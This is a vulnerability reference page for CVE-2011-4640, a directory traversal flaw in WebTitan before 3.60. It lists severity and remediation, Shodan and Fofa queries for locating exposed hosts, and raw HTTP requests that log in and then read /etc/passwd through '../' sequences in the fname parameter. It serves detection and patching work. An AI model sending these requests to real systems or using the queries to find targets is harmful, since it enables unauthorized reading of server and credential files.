🔙 목록으로 돌아가기

CVE-2011-4640: WebTitan < 3.60 - Local File Inclusion

TitleWebTitan < 3.60 - Local File Inclusion
Authorctflearner
SeverityMedium
ImpactAttackers can read arbitrary files on the server by exploiting directory traversal, potentially exposing database credentials and sensitive configuration data.
RemediationUpdate to WebTitan version 3.60 or later that properly validates and sanitizes file path parameters.
CVSS Score4
EPSS Score0.12255
CVE IDCVE-2011-4640
CWE IDCWE-22
Shodan Querytitle:"WebTitan"http.favicon.hash:1090061843
Fofa Queryicon_hash=1090061843title="webtitan"
Tags cve cve2011 lfi spamtitan webtitan authenticated vuln

🔍 Vulnerability Description

Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.

🌐 HTTP Request

GET /login-x.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST /login-x.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Connection: close
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

jaction=login&language=en_US&username=rYrBOW&password=XGmmTJ
GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-4640.yaml

🦈 Packet Capture: ⬇️ Download cve-2011-4640.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A